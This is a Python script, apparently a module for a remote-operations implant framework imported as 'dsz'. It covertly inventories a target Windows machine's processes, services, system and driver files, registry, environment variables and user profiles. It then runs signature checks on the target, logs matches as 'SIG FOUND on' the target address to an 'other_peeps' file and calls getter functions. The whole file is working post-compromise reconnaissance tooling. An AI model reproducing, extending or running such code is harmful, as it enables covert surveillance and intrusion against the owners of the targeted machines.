147 lines
6.5 KiB
Python
147 lines
6.5 KiB
Python
|
|
||
|
import os
|
||
|
import sys
|
||
|
import dsz.version.checks
|
||
|
import dsz.cmd
|
||
|
import dsz.path.windows
|
||
|
import ops
|
||
|
import datastore
|
||
|
from sigs import FIND_SIG, GET_SIG
|
||
|
|
||
|
def getProcData():
|
||
|
(cmdStatus, cmdId) = dsz.cmd.RunEx('processes -list -minimal', dsz.RUN_FLAG_RECORD)
|
||
|
if (not cmdStatus):
|
||
|
return False
|
||
|
try:
|
||
|
pids = dsz.cmd.data.Get('InitialProcessListItem::ProcessItem::Id', dsz.TYPE_INT, cmdId)
|
||
|
ppids = dsz.cmd.data.Get('InitialProcessListItem::ProcessItem::ParentId', dsz.TYPE_INT, cmdId)
|
||
|
names = dsz.cmd.data.Get('InitialProcessListItem::ProcessItem::Name', dsz.TYPE_STRING, cmdId)
|
||
|
paths = dsz.cmd.data.Get('InitialProcessListItem::ProcessItem::Path', dsz.TYPE_STRING, cmdId)
|
||
|
users = dsz.cmd.data.Get('InitialProcessListItem::ProcessItem::User', dsz.TYPE_STRING, cmdId)
|
||
|
except RuntimeError:
|
||
|
pids = None
|
||
|
if (pids is None):
|
||
|
return False
|
||
|
datastore.PROCESS_NAME_SET = set(names)
|
||
|
datastore.PROCESS_DATA = zip(pids, ppids, names, paths, users)
|
||
|
return True
|
||
|
|
||
|
def getSvcData():
|
||
|
(cmdStatus, cmdId) = dsz.cmd.RunEx('services', dsz.RUN_FLAG_RECORD)
|
||
|
if (not cmdStatus):
|
||
|
return False
|
||
|
try:
|
||
|
svcnames = dsz.cmd.data.Get('service::servicename', dsz.TYPE_STRING, cmdId)
|
||
|
dispnames = dsz.cmd.data.Get('service::displayname', dsz.TYPE_STRING, cmdId)
|
||
|
states = dsz.cmd.data.Get('service::state', dsz.TYPE_STRING, cmdId)
|
||
|
types = dsz.cmd.data.Get('service::servicetype::value', dsz.TYPE_INT, cmdId)
|
||
|
except RuntimeError:
|
||
|
svcnames = None
|
||
|
if (svcnames is None):
|
||
|
return False
|
||
|
datastore.SERVICE_NAME_SET = set(svcnames)
|
||
|
datastore.SERVICE_DATA = zip(svcnames, dispnames, states, types)
|
||
|
return True
|
||
|
|
||
|
def getFsData():
|
||
|
(syspath, systemroot) = dsz.path.windows.GetSystemPaths()
|
||
|
datastore.SYSPATH_STR = syspath
|
||
|
datastore.SYSTEMROOT_STR = (u'%s\\%s' % (syspath, systemroot))
|
||
|
datastore.DRIVERPATH_STR = (u'%s\\%s\\%s' % (syspath, systemroot, 'drivers'))
|
||
|
datastore.ENV_VARS = {}
|
||
|
(cmdStatus, cmdId) = dsz.cmd.RunEx(('dir -mask * -path %s' % syspath), dsz.RUN_FLAG_RECORD)
|
||
|
if cmdStatus:
|
||
|
names = dsz.cmd.data.Get('DirItem::FileItem::name', dsz.TYPE_STRING, cmdId)
|
||
|
datastore.SYSPATH_FILE_SET = set(names)
|
||
|
(cmdStatus, cmdId) = dsz.cmd.RunEx(('dir -mask * -path %s' % datastore.SYSTEMROOT_STR), dsz.RUN_FLAG_RECORD)
|
||
|
if cmdStatus:
|
||
|
names = dsz.cmd.data.Get('DirItem::FileItem::name', dsz.TYPE_STRING, cmdId)
|
||
|
datastore.SYSTEMROOT_FILE_SET = set(names)
|
||
|
(cmdStatus, cmdId) = dsz.cmd.RunEx(('dir -mask * -path %s' % datastore.DRIVERPATH_STR), dsz.RUN_FLAG_RECORD)
|
||
|
if cmdStatus:
|
||
|
names = dsz.cmd.data.Get('DirItem::FileItem::name', dsz.TYPE_STRING, cmdId)
|
||
|
sizes = dsz.cmd.data.Get('DirItem::FileItem::size', dsz.TYPE_INT, cmdId)
|
||
|
dirflags = dsz.cmd.data.Get('DirItem::FileItem::Attributes::directory', dsz.TYPE_BOOL, cmdId)
|
||
|
datastore.DRIVERPATH_FILE_SET = set(names)
|
||
|
datastore.DRIVERPATH_DATA = zip(names, sizes, dirflags)
|
||
|
(cmdStatus, cmdId) = dsz.cmd.RunEx('registryquery -hive L -key "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList" -value ProfilesDirectory', dsz.RUN_FLAG_RECORD)
|
||
|
if cmdStatus:
|
||
|
try:
|
||
|
[profile_path] = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING, cmdId)
|
||
|
print ('got profile path: %s' % profile_path)
|
||
|
except RuntimeError:
|
||
|
profile_path = None
|
||
|
else:
|
||
|
return False
|
||
|
(suc, cmdid) = dsz.cmd.RunEx('environment -get', dsz.RUN_FLAG_RECORD)
|
||
|
if suc:
|
||
|
cmd_vars = dsz.cmd.data.Get('environment::value', dsz.TYPE_OBJECT, cmdId=cmdid)
|
||
|
for cmd_var in cmd_vars:
|
||
|
[env_var_name] = dsz.cmd.data.Get(('%s::name' % cmd_var), dsz.TYPE_STRING)
|
||
|
[env_var_val] = dsz.cmd.data.Get(('%s::value' % cmd_var), dsz.TYPE_STRING)
|
||
|
datastore.ENV_VARS[env_var_name] = env_var_val
|
||
|
else:
|
||
|
return False
|
||
|
sys_drive = datastore.ENV_VARS.get('SystemDrive')
|
||
|
datastore.PROGRAM_FILES_STR = datastore.ENV_VARS.get('ProgramFiles', ('%s\\..\\Program Files' % datastore.SYSPATH_STR))
|
||
|
if dsz.version.checks.IsOs64Bit():
|
||
|
datastore.PROGRAM_FILESX86_STR = datastore.ENV_VARS.get('ProgramFiles(x86)', ('%s\\..\\Program Files (x86)' % datastore.SYSPATH_STR))
|
||
|
datastore.PROFILE_PATH = profile_path.replace('%%SystemDrive%%', sys_drive)
|
||
|
(cmdStatus, cmdId) = dsz.cmd.RunEx(('dir -mask * -path "%s" -dirsonly' % datastore.PROFILE_PATH), dsz.RUN_FLAG_RECORD)
|
||
|
if cmdStatus:
|
||
|
user_dirs = dsz.cmd.data.Get('diritem::fileitem::name', dsz.TYPE_STRING, cmdId)
|
||
|
if ('.' in user_dirs):
|
||
|
user_dirs.remove('.')
|
||
|
if ('..' in user_dirs):
|
||
|
user_dirs.remove('..')
|
||
|
datastore.USER_DIRS_LIST = user_dirs
|
||
|
else:
|
||
|
datastore.USER_DIRS_LIST = list()
|
||
|
return True
|
||
|
|
||
|
def getRegData():
|
||
|
(cmdStatus, cmdId) = dsz.cmd.RunEx('registryquery -hive U', dsz.RUN_FLAG_RECORD)
|
||
|
if (not cmdStatus):
|
||
|
return False
|
||
|
try:
|
||
|
subkeys = dsz.cmd.data.Get('key::subkey::name', dsz.TYPE_STRING, cmdId)
|
||
|
except:
|
||
|
subkeys = None
|
||
|
if (subkeys is None):
|
||
|
return False
|
||
|
datastore.HKEY_USERS_DATA = subkeys
|
||
|
return True
|
||
|
|
||
|
def sigcheck():
|
||
|
dsz.control.Method()
|
||
|
dsz.control.echo.Off()
|
||
|
getProcData()
|
||
|
getSvcData()
|
||
|
getFsData()
|
||
|
getRegData()
|
||
|
sig_found = False
|
||
|
other_peeps = os.path.join(ops.LOGDIR, 'other_peeps.txt')
|
||
|
for x in range(len(FIND_SIG)):
|
||
|
if (FIND_SIG[x] is None):
|
||
|
continue
|
||
|
result = FIND_SIG[x]()
|
||
|
if result:
|
||
|
sig_found = True
|
||
|
try:
|
||
|
with open(other_peeps, 'a') as fd:
|
||
|
fd.write(('SIG%02d FOUND on %s!\n' % ((x + 1), ops.TARGET_ADDR)))
|
||
|
except IOError as ioe:
|
||
|
print ('Error Writing File: %s' % ioe.__str__())
|
||
|
dsz.cmd.RunEx(('script DropboxWrapper.dss AppendFileDefaultName SIG%02d ItsHere' % (x + 1)), 0)
|
||
|
print ('find_%02d return true' % (x + 1))
|
||
|
if (GET_SIG[x] is not None):
|
||
|
print ('calling getter for sig %02d' % (x + 1))
|
||
|
GET_SIG[x]()
|
||
|
else:
|
||
|
print ('find_%02d returned false' % (x + 1))
|
||
|
if (sig_found and os.path.isfile(other_peeps)):
|
||
|
dsz.cmd.RunEx(('local run -command "cmd.exe /c notepad.exe %s"' % other_peeps), 0)
|
||
|
return True
|
||
|
if (__name__ == '__main__'):
|
||
|
if (not sigcheck()):
|
||
|
sys.exit(1)
|